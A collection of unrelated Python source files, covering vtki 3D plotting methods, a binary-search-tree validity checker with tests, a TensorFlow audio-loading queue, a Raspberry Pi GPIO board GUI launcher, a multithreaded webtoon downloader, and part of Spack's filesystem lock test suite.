>>> from vtki import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> legend_entries = []
>>> legend_entries.append(['My Mesh', 'w'])
>>> legend_entries.append(['My Other Mesh', 'k'])
>>> plotter = vtki.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.add_mesh(othermesh, 'k')
>>> _ = plotter.add_legend(legend_entries)
>>> plotter.show() # doctest:+SKIP
"""
self.legend = vtk.vtkLegendBoxActor()
if labels is None:
# use existing labels
if not self._labels:
raise Exception('No labels input.\n\n' +
'Add labels to individual items when adding them to' +
'the plotting object with the "label=" parameter. ' +
'or enter them as the "labels" parameter.')
self.legend.SetNumberOfEntries(len(self._labels))
for i, (vtk_object, text, color) in enumerate(self._labels):
self.legend.SetEntry(i, vtk_object, text, parse_color(color))
else:
self.legend.SetNumberOfEntries(len(labels))
legendface = single_triangle()
for i, (text, color) in enumerate(labels):
self.legend.SetEntry(i, legendface, text, parse_color(color))
if size:
self.legend.SetPosition2(size[0], size[1])
if bcolor is None:
self.legend.UseBackgroundOff()
else:
self.legend.UseBackgroundOn()
self.legend.SetBackgroundColor(bcolor)
if border:
self.legend.BorderOn()
else:
self.legend.BorderOff()
# Add to renderer
self.add_actor(self.legend, reset_camera=False, name=name)
return self.legend
@property
def camera_position(self):
""" Returns camera position of the active render window """
return self.renderer.camera_position
@camera_position.setter
def camera_position(self, camera_location):
""" Set camera position of the active render window """
self.renderer.camera_position = camera_location
def reset_camera(self):
"""
Reset camera so it slides along the vector defined from camera
position to focal point until all of the actors can be seen.
"""
self.renderer.reset_camera()
self._render()
def isometric_view(self):
"""DEPRECATED: Please use ``view_isometric``"""
return self.view_isometric()
def view_isometric(self):
"""
Resets the camera to a default isometric view showing all the
actors in the scene.
"""
return self.renderer.view_isometric()
def view_vector(self, vector, viewup=None):
return self.renderer.view_vector(vector, viewup=viewup)
def view_xy(self, negative=False):
"""View the XY plane"""
return self.renderer.view_xy(negative=negative)
def view_xz(self, negative=False):
"""View the XZ plane"""
return self.renderer.view_xz(negative=negative)
def view_yz(self, negative=False):
"""View the YZ plane"""
return self.renderer.view_yz(negative=negative)
def disable(self):
"""Disable this renderer's camera from being interactive"""
return self.renderer.disable()
def enable(self):
"""Enable this renderer's camera to be interactive"""
return self.renderer.enable()
def set_background(self, color, loc='all'):
"""
Sets background color
Parameters
----------
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
loc : int, tuple, list, or str, optional
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If ``loc='all'`` then all
render windows will have their background set.
"""
if color is None:
color = rcParams['background']
if isinstance(color, str):
if color.lower() in 'paraview' or color.lower() in 'pv':
# Use the default ParaView background color
color = PV_BACKGROUND
else:
color = vtki.string_to_rgb(color)
if loc =='all':
for renderer in self.renderers:
renderer.SetBackground(color)
else:
renderer = self.renderers[self.loc_to_index(loc)]
renderer.SetBackground(color)
@property
def background_color(self):
""" Returns background color of the first render window """
return self.renderers[0].GetBackground()
@background_color.setter
def background_color(self, color):
""" Sets the background color of all the render windows """
self.set_background(color)
def remove_legend(self):
""" Removes legend actor """
if hasattr(self, 'legend'):
self.remove_actor(self.legend, reset_camera=False)
self._render()
def enable_cell_picking(self, mesh=None, callback=None):
"""
Enables picking of cells. Press r to enable retangle based
selection. Press "r" again to turn it off. Selection will be
saved to self.picked_cells.
Uses last input mesh for input
Parameters
----------
mesh : vtk.UnstructuredGrid, optional
UnstructuredGrid grid to select cells from. Uses last
input grid by default.
callback : function, optional
When input, calls this function after a selection is made.
The picked_cells are input as the first parameter to this function.
"""
if mesh is None:
if not hasattr(self, 'mesh'):
raise Exception('Input a mesh into the Plotter class first or '
+ 'or set it in this function')
mesh = self.mesh
def pick_call_back(picker, event_id):
extract = vtk.vtkExtractGeometry()
mesh.cell_arrays['orig_extract_id'] = np.arange(mesh.n_cells)
extract.SetInputData(mesh)
extract.SetImplicitFunction(picker.GetFrustum())
extract.Update()
self.picked_cells = vtki.wrap(extract.GetOutput())
if callback is not None:
callback(self.picked_cells)
area_picker = vtk.vtkAreaPicker()
area_picker.AddObserver(vtk.vtkCommand.EndPickEvent, pick_call_back)
self.enable_rubber_band_style()
self.iren.SetPicker(area_picker)
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, z_shift=None):
"""Genrates an orbital path around the data scene
Parameters
----------
facotr : float
A scaling factor when biulding the orbital extent
n_points : int
number of points on the orbital path
viewup : list(float)
the normal to the orbital plane
z_shift : float, optional
shift the plane up/down from the center of the scene by this amount
"""
if viewup is None:
viewup = rcParams['camera']['viewup']
center = list(self.center)
bnds = list(self.bounds)
if z_shift is None:
z_shift = (bnds[5] - bnds[4]) * factor
center[2] = center[2] + z_shift
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
return vtki.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(point):
"""Given a position point, move the current camera's focal point to that
point. The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
"""
return self.iren.FlyTo(self.renderer, *point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None, bkg=True):
"""Orbit on the given path focusing on the focus point
Parameters
----------
path : vtki.PolyData
Path of orbital points. The order in the points is the order of
travel
focus : list(float) of length 3, optional
The point ot focus the camera.
step : float, optional
The timestep between flying to each camera position
viewup : list(float)
the normal to the orbital plane
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = rcParams['camera']['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_vtki_obj(path):
path = vtki.PolyData(path)
points = path.points
def orbit():
"""Internal thread for running the orbit"""
for point in points:
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
time.sleep(step)
if bkg:
thread = Thread(target=orbit)
thread.start()
else:
orbit()
return
def export_vtkjs(self, filename, compress_arrays=False):
"""
Export the current rendering scene as a VTKjs scene for
rendering in a web browser
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(vtki.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(vtki.FIGURE_PATH, filename)
return export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
class Plotter(BasePlotter):
""" Plotting object to display vtk meshes or numpy arrays.
Example
-------
>>> import vtki
>>> from vtki import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = vtki.Plotter()
>>> _ = plotter.add_mesh(mesh, color='red')
>>> _ = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show() # doctest:+SKIP
Parameters
----------
off_screen : bool, optional
Renders off screen when False. Useful for automated screenshots.
notebook : bool, optional
When True, the resulting plot is placed inline a jupyter notebook.
Assumes a jupyter console is active. Automatically enables off_screen.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render
window.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
"""
last_update_time = 0.0
q_pressed = False
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
border=None, border_color='k', border_width=1.0,
window_size=None):
"""
Initialize a vtk plotting object
"""
super(Plotter, self).__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width)
log.debug('Initializing')
def on_timer(iren, event_id):
""" Exit application if interactive renderer stops """
if event_id == 'TimerEvent':
self.iren.TerminateApp()
if off_screen is None:
off_screen = vtki.OFF_SCREEN
if notebook is None:
if run_from_ipython():
try:
notebook = type(get_ipython()).__module__.startswith('ipykernel.')
except NameError:
pass
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
if window_size is None:
window_size = vtki.rcParams['window_size']
# initialize render window
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.SetBorders(True)
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
else: # Allow user to interact
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.LightFollowCameraOff()
self.iren.SetDesiredUpdateRate(30.0)
self.iren.SetRenderWindow(self.ren_win)
self.enable_trackball_style()
self.iren.AddObserver("KeyPressEvent", self.key_press_event)
self.update_style()
# for renderer in self.renderers:
# self.iren.SetRenderWindow(renderer)
# Set background
self.set_background(rcParams['background'])
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
if hasattr(self, 'iren'):
self.iren.AddObserver(vtk.vtkCommand.TimerEvent, on_timer)
def show(self, title=None, window_size=None, interactive=True,
auto_close=True, interactive_update=False, full_screen=False,
screenshot=False, return_img=False, use_panel=None):
"""
Creates plotting window
Parameters
----------
title : string, optional
Title of plotting window.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
auto_close : bool, optional
Enabled by default. Exits plotting session when user
closes the window when interactive is True.
interactive_update: bool, optional
Disabled by default. Allows user to non-blocking draw,
user should call Update() in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
window_size. Default False.
use_panel : bool, optional
If False, the interactive rendering from panel will not be used in
notebooks
Returns
-------
cpos : list
List of camera position, focal point, and view up
"""
if use_panel is None:
use_panel = rcParams['use_panel']
# reset unless camera for the first render unless camera is set
if self.first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
self.first_time = False
if title:
self.ren_win.SetWindowName(title)
# if full_screen:
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
self.ren_win.SetSize(window_size[0], window_size[1])
# Render
log.debug('Rendering')
self.ren_win.Render()
if interactive and (not self.off_screen):
try: # interrupts will be caught here
log.debug('Starting iren')
self.update_style()
self.iren.Initialize()
if not interactive_update:
self.iren.Start()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
# Keep track of image for sphinx-gallery
self.last_image = self.screenshot(screenshot, return_img=True)
# Get camera position before closing
cpos = self.camera_position
if self.notebook:
# sanity check
try:
import IPython
except ImportError:
raise Exception('Install IPython to display image in a notebook')
disp = None
if use_panel:
try:
from panel.pane import VTK as panel_display
disp = panel_display(self.ren_win, sizing_mode='stretch_width',
height=400)
except:
pass
if disp is None or self.shape != (1,1):
import PIL.Image
disp = IPython.display.display(PIL.Image.fromarray(self.last_image))
if auto_close:
self.close()
if self.notebook:
return disp
if return_img or screenshot == True:
return cpos, self.last_image
return cpos
def plot(self, *args, **kwargs):
""" Present for backwards compatibility. Use `show()` instead """
return self.show(*args, **kwargs)
def render(self):
""" renders main window """
self.ren_win.Render()
def single_triangle():
""" A single PolyData triangle """
points = np.zeros((3, 3))
points[1] = [1, 0, 0]
points[2] = [0.5, 0.707, 0]
cells = np.array([[3, 0, 1, 2]], ctypes.c_long)
return vtki.PolyData(points, cells)
def parse_color(color):
""" Parses color into a vtk friendly rgb list """
if color is None:
color = rcParams['color']
if isinstance(color, str):
return vtki.string_to_rgb(color)
elif len(color) == 3:
return color
else:
raise Exception("""
Invalid color input
Must ba string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'""")
def parse_font_family(font_family):
""" checks font name """
# check font name
font_family = font_family.lower()
if font_family not in ['courier', 'times', 'arial']:
raise Exception('Font must be either "courier", "times" ' +
'or "arial"')
return FONT_KEYS[font_family]
def plot_compare_four(data_a, data_b, data_c, data_d, disply_kwargs=None,
plotter_kwargs=None, show_kwargs=None, screenshot=None,
camera_position=None, outline=None, outline_color='k',
labels=('A', 'B', 'C', 'D')):
"""Plot a 2 by 2 comparison of data objects. Plotting parameters and camera
positions will all be the same.
"""
datasets = [[data_a, data_b], [data_c, data_d]]
labels = [labels[0:2], labels[2:4]]
if plotter_kwargs is None:
plotter_kwargs = {}
if disply_kwargs is None:
disply_kwargs = {}
if show_kwargs is None:
show_kwargs = {}
p = vtki.Plotter(shape=(2,2), **plotter_kwargs)
for i in range(2):
for j in range(2):
p.subplot(i, j)
p.add_mesh(datasets[i][j], **disply_kwargs)
p.add_text(labels[i][j])
if is_vtki_obj(outline):
p.add_mesh(outline, color=outline_color)
if camera_position is not None:
p.camera_position = camera_position
return p.show(screenshot=screenshot, **show_kwargs)
|
solution.py
|
# python3
from abc import ABC
from collections import namedtuple
from sys import setrecursionlimit, stdin
from threading import stack_size, Thread
from typing import AnyStr, IO, List
from unittest import TestCase
setrecursionlimit(10 ** 6)
stack_size(2 ** 27)
border = namedtuple('border', 'left right')
test = namedtuple('test', 'input expected')
class TreeChecker:
def __init__(self):
self.n = 0
self.key = self.left = self.right = None
def read(self, src: IO):
self.n = int(src.readline())
self.key = [0 for _ in range(self.n)]
self.left = [0 for _ in range(self.n)]
self.right = [0 for _ in range(self.n)]
for i in range(self.n):
[self.key[i], self.left[i], self.right[i]] = map(int, src.readline().split())
return self
def check(self, node: int = 0, bound: border = border(-2 ** 31 - 1, 2 ** 31)) -> bool:
if self.n < 2:
return True
root = self.key[node]
left = self.left[node]
if left != -1:
if self.key[left] >= root:
return False
if self.key[left] < bound.left:
return False
if not self.check(left, border(bound.left, root)):
return False
right = self.right[node]
if right != -1:
if self.key[right] < root:
return False
if self.key[right] >= bound.right:
return False
if not self.check(right, border(root, bound.right)):
return False
return True
class Fake(IO, ABC):
def __init__(self, rows: List[str]):
self.__i = -1
self.__rows = [str(len(rows))] + rows
def readline(self, limit: int = -1) -> AnyStr:
self.__i += 1
return self.__rows[self.__i]
class Test(TestCase):
def test_tree_checker(self):
tests = [
# samples
test([
'2 1 2',
'1 -1 -1',
'3 -1 -1',
], True),
test([
'1 1 2',
'2 -1 -1',
'3 -1 -1',
], False),
test([
'2 1 2',
'1 -1 -1',
'2 -1 -1',
], True),
test([
'2 1 2',
'2 -1 -1',
'3 -1 -1',
], False),
test([], True),
test(['2147483647 -1 -1'], True),
test([
'1 -1 1',
'2 -1 2',
'3 -1 3',
'4 -1 4',
'5 -1 -1',
], True),
test([
'4 1 2',
'2 3 4',
'6 5 6',
'1 -1 -1',
'3 -1 -1',
'5 -1 -1',
'7 -1 -1',
], True),
# additional
test([
'4 1 -1',
'2 -1 2',
'4 -1 -1',
], False),
]
for i, t in enumerate(tests):
src = Fake(t.input)
self.assertEqual(t.expected, TreeChecker().read(src).check(), msg='at {} position'.format(i))
def main():
print('CORRECT') if TreeChecker().read(stdin).check() else print('INCORRECT')
if __name__ == '__main__':
Thread(target=main).start()
|
audio_reader.py
|
import fnmatch
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
def randomize_files(files):
for file in files:
file_index = random.randint(0, (len(files) - 1))
yield files[file_index]
def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(text):
'''
alist.sort(key=natural_keys) sorts in human order
http://nedbatchelder.com/blog/200712/human_sorting.html
(See Toothy's implementation in the comments)
'''
return [ atoi(c) for c in re.split('(\d+)', text) ]
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
files.sort(key=natural_keys)
random.seed(232)
#index_shuf = range(len(files))
#shuffle(index_shuf)
#files = [files[i] for i in index_shuf]
random.shuffle(files)
#files.sort(key=natural_keys)
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
#randomized_files = randomize_files(files)
randomized_files = files
for filename in randomized_files:
ids = id_reg_exp.findall(filename)
if not ids:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = int(ids[0][0])
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
yield audio, filename, category_id
def trim_silence(audio, threshold):
'''Removes silence at the beginning and end of a sample.'''
energy = librosa.feature.rmse(audio)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if not ids:
return True
return False
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
receptive_field,
sample_size=None,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.receptive_field = receptive_field
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
if self.gc_enabled:
self.id_placeholder = tf.placeholder(dtype=tf.int32, shape=())
self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
# Determine the number of mutually-exclusive categories we will
# accomodate in our embedding table.
if self.gc_enabled:
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
# to keep the code simpler, and preserves correspondance between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def dequeue_gc(self, num_elements):
return self.gc_queue.dequeue_many(num_elements)
def thread_main(self, sess):
stop = False
# Go through the dataset multiple times
#while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename, category_id in iterator:
print (filename)
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
#audio = trim_silence(audio[:, 0], self.silence_threshold)
#audio = audio.reshape(-1, 1)
if audio.size == 0:
print("Warning: {} was ignored as it contains only "
"silence. Consider decreasing trim_silence "
"threshold, or adjust volume of the audio."
.format(filename))
audio = np.pad(audio, [[self.receptive_field, 0], [0, 0]],
'constant')
if self.sample_size:
# Cut samples into pieces of size receptive_field +
# sample_size with receptive_field overlap
while len(audio) > self.receptive_field:
piece = audio[:(self.receptive_field +
self.sample_size), :]
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
audio = audio[self.sample_size:, :]
if self.gc_enabled:
sess.run(self.gc_enqueue, feed_dict={
self.id_placeholder: category_id})
else:
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: audio})
if self.gc_enabled:
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder: category_id})
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
|
virtualboard.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# ## #############################################################
# virtualboard.py
#
# Author: Mauricio Matamoros
# Licence: MIT
# Date:
#
# ## #############################################################
# Future imports (Python 2.7 compatibility)
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from atexit import register
from threading import Thread
from board import Board
from tkinter import mainloop
import RPi.GPIO as GPIO
def exit_handler():
print('Shutting down board GUI')
if _async_board_thread:
_async_board_thread.join()
def _async_board_worker():
global _async_board_thread
board = Board()
board.connect(GPIO._io_pins)
try:
mainloop()
except:
pass
_async_board_thread = None
_async_board_thread = Thread(target=_async_board_worker)
register(exit_handler)
_async_board_thread.start()
|
main.py
|
import importlib
import logging
import os
import threading
import queue
import click
import requests
from webtoon_dl.providers import mapping, exceptions
from webtoon_dl.utils import parse_extension, sanitize_filename
_terminated = False
_total = 1
logger = logging.getLogger('logger')
formatter = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s')
ch = logging.StreamHandler()
ch.setFormatter(formatter)
logger.addHandler(ch)
def worker(q):
tid = threading.get_ident()
while True:
job = q.get()
if job is None or _terminated:
logger.debug('[%d] Got termination signal; terminating...' % tid)
q.task_done()
break
ep_name, dirname, headers, urls = job # TODO:Queue structure
if not os.path.exists(dirname):
os.makedirs(dirname)
logger.debug('[%d] Downloading #%s to %s' % (tid, ep_name, dirname))
counter = 1
for url in urls:
resp = requests.get(url, headers=headers)
path = dirname + '/' + str(counter) + parse_extension(url)
with open(path, 'wb') as image:
for chunk in resp.iter_content(1024):
image.write(chunk)
counter = counter + 1
logger.info('%d/%d downloaded (%s)' % (_total - q.qsize() + 1, _total, ep_name))
q.task_done()
def find_provider(url):
for pattern, module in mapping:
try:
match = url.find(pattern) > -1
except TypeError:
match = pattern(url)
if match:
logger.info('Using provider %s' % module)
return importlib.import_module('.' + module,
package='webtoon_dl.providers')
@click.command()
@click.option('--count', '-c', default=0, help='Episodes to download. Unlimited if 0.')
@click.option('-j', default=8, help='Maximum count of threads.')
@click.option('--dest', '-d', type=click.Path(), default='.',
help='Path to directory to download comic. Defaults to current directory.')
@click.option('--verbosity', default=1, type=click.IntRange(min=0, max=2, clamp=True),
help='Verbosity, 0 to 2. Defaults to 1')
@click.argument('url')
def main(count, url, j, dest, verbosity):
"""
A blazing fast webtoon downloader.
"""
global _total, _terminated
logger.setLevel(30 - verbosity * 10)
provider = find_provider(url)
# Start workers
threads = []
q = queue.Queue()
for i in range(j):
t = threading.Thread(target=worker, args=(q,))
t.start()
threads.append(t)
episode_url = url
current = 1
html_src = requests.get(episode_url).text # TODO: Custom header & cookie
provider.initialize(url)
dirname = os.path.join(dest, provider.get_dirname(html_src))
req_header = provider.build_header(html_src, episode_url)
ep_name = sanitize_filename(provider.get_episode_name(html_src))
q.put((ep_name, dirname + ep_name, req_header, provider.get_image_list(html_src)))
logger.debug("Dirname: " + dirname)
logger.info("Downloading to: %s", os.path.normpath(dirname))
while not current == count:
try:
logger.debug("Enqueued %s" % ep_name)
episode_url = provider.get_next_episode_url(html_src)
html_src = requests.get(episode_url).text
req_header = provider.build_header(html_src, episode_url)
ep_name = sanitize_filename(provider.get_episode_name(html_src))
_total = _total + 1
current = current + 1
q.put((ep_name, dirname + ep_name, req_header, provider.get_image_list(html_src)))
except exceptions.EndOfComic:
logger.debug("End of comic")
break
except KeyboardInterrupt:
click.echo("Aborted!")
break
logger.debug('Signalling termination')
for i in threads:
q.put(None)
logger.debug('Waiting for queue to empty out')
try:
q.join()
except KeyboardInterrupt:
logger.debug("Panic")
_terminated = True
if __name__ == "__main__":
main()
|
lock.py
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""These tests ensure that our lock works correctly.
This can be run in two ways.
First, it can be run as a node-local test, with a typical invocation like
this::
spack test lock
You can *also* run it as an MPI program, which allows you to test locks
across nodes. So, e.g., you can run the test like this::
mpirun -n 7 spack test lock
And it will test locking correctness among MPI processes. Ideally, you
want the MPI processes to span across multiple nodes, so, e.g., for SLURM
you might do this::
srun -N 7 -n 7 -m cyclic spack test lock
You can use this to test whether your shared filesystem properly supports
POSIX reader-writer locking with byte ranges through fcntl.
If you want to test on multiple filesystems, you can modify the
``locations`` list below. By default it looks like this::
locations = [
tempfile.gettempdir(), # standard tmp directory (potentially local)
'/nfs/tmp2/%u', # NFS tmp mount
'/p/lscratch*/%u' # Lustre scratch mount
]
Add names and paths for your preferred filesystem mounts to test on them;
the tests are parametrized to run on all the filesystems listed in this
dict. Note that 'tmp' will be skipped for MPI testing, as it is often a
node-local filesystem, and multi-node tests will fail if the locks aren't
actually on a shared filesystem.
"""
import collections
import os
import socket
import shutil
import tempfile
import traceback
import glob
import getpass
from contextlib import contextmanager
from multiprocessing import Process, Queue
import pytest
import llnl.util.lock as lk
import llnl.util.multiproc as mp
from llnl.util.filesystem import touch
#
# This test can be run with MPI. MPI is "enabled" if we can import
# mpi4py and the number of total MPI processes is greater than 1.
# Otherwise it just runs as a node-local test.
#
# NOTE: MPI mode is different from node-local mode in that node-local
# mode will spawn its own test processes, while MPI mode assumes you've
# run this script as a SPMD application. In MPI mode, no additional
# processes are spawned, and you need to ensure that you mpirun the
# script with enough processes for all the multiproc_test cases below.
#
# If you don't run with enough processes, tests that require more
# processes than you currently have will be skipped.
#
mpi = False
comm = None
try:
from mpi4py import MPI
comm = MPI.COMM_WORLD
if comm.size > 1:
mpi = True
except ImportError:
pass
"""This is a list of filesystem locations to test locks in. Paths are
expanded so that %u is replaced with the current username. '~' is also
legal and will be expanded to the user's home directory.
Tests are skipped for directories that don't exist, so you'll need to
update this with the locations of NFS, Lustre, and other mounts on your
system.
"""
locations = [
tempfile.gettempdir(),
os.path.join('/nfs/tmp2/', getpass.getuser()),
os.path.join('/p/lscratch*/', getpass.getuser()),
]
"""This is the longest a failed multiproc test will take.
Barriers will time out and raise an exception after this interval.
In MPI mode, barriers don't time out (they hang). See mpi_multiproc_test.
"""
barrier_timeout = 5
"""This is the lock timeout for expected failures.
This may need to be higher for some filesystems."""
lock_fail_timeout = 0.1
def make_readable(*paths):
for path in paths:
mode = 0o555 if os.path.isdir(path) else 0o444
os.chmod(path, mode)
def make_writable(*paths):
for path in paths:
mode = 0o755 if os.path.isdir(path) else 0o744
os.chmod(path, mode)
@contextmanager
def read_only(*paths):
modes = [os.stat(p).st_mode for p in paths]
make_readable(*paths)
yield
for path, mode in zip(paths, modes):
os.chmod(path, mode)
@pytest.fixture(scope='session', params=locations)
def lock_test_directory(request):
"""This fixture causes tests to be executed for many different mounts.
See the ``locations`` dict above for details.
"""
return request.param
@pytest.fixture(scope='session')
def lock_dir(lock_test_directory):
parent = next((p for p in glob.glob(lock_test_directory)
if os.path.exists(p) and os.access(p, os.W_OK)), None)
if not parent:
# Skip filesystems that don't exist or aren't writable
pytest.skip("requires filesystem: '%s'" % lock_test_directory)
elif mpi and parent == tempfile.gettempdir():
# Skip local tmp test for MPI runs
pytest.skip("skipping local tmp directory for MPI test.")
tempdir = None
if not mpi or comm.rank == 0:
tempdir = tempfile.mkdtemp(dir=parent)
if mpi:
tempdir = comm.bcast(tempdir)
yield tempdir
if mpi:
# rank 0 may get here before others, in which case it'll try to
# remove the directory while other processes try to re-create the
# lock. This will give errno 39: directory not empty. Use a
# barrier to ensure everyone is done first.
comm.barrier()
if not mpi or comm.rank == 0:
make_writable(tempdir)
shutil.rmtree(tempdir)
@pytest.fixture
def private_lock_path(lock_dir):
"""In MPI mode, this is a private lock for each rank in a multiproc test.
For other modes, it is the same as a shared lock.
"""
lock_file = os.path.join(lock_dir, 'lockfile')
if mpi:
lock_file += '.%s' % comm.rank
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
@pytest.fixture
def lock_path(lock_dir):
"""This lock is shared among all processes in a multiproc test."""
lock_file = os.path.join(lock_dir, 'lockfile')
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
def test_poll_interval_generator():
interval_iter = iter(
lk.Lock._poll_interval_generator(_wait_times=[1, 2, 3]))
intervals = list(next(interval_iter) for i in range(100))
assert intervals == [1] * 20 + [2] * 40 + [3] * 40
def local_multiproc_test(*functions, **kwargs):
"""Order some processes using simple barrier synchronization."""
b = mp.Barrier(len(functions), timeout=barrier_timeout)
args = (b,) + tuple(kwargs.get('extra_args', ()))
procs = [Process(target=f, args=args, name=f.__name__)
for f in functions]
for p in procs:
p.start()
for p in procs:
p.join()
assert all(p.exitcode == 0 for p in procs)
def mpi_multiproc_test(*functions):
"""SPMD version of multiproc test.
This needs to be run like so:
srun spack test lock
Each process executes its corresponding function. This is different
from ``multiproc_test`` above, which spawns the processes. This will
skip tests if there are too few processes to run them.
"""
procs = len(functions)
if procs > comm.size:
pytest.skip("requires at least %d MPI processes" % procs)
comm.Barrier() # barrier before each MPI test
include = comm.rank < len(functions)
subcomm = comm.Split(include)
class subcomm_barrier(object):
"""Stand-in for multiproc barrier for MPI-parallel jobs."""
def wait(self):
subcomm.Barrier()
if include:
try:
functions[subcomm.rank](subcomm_barrier())
except BaseException:
# aborting is the best we can do for MPI tests without
# hanging, since we're using MPI barriers. This will fail
# early and it loses the nice pytest output, but at least it
# gets use a stacktrace on the processes that failed.
traceback.print_exc()
comm.Abort()
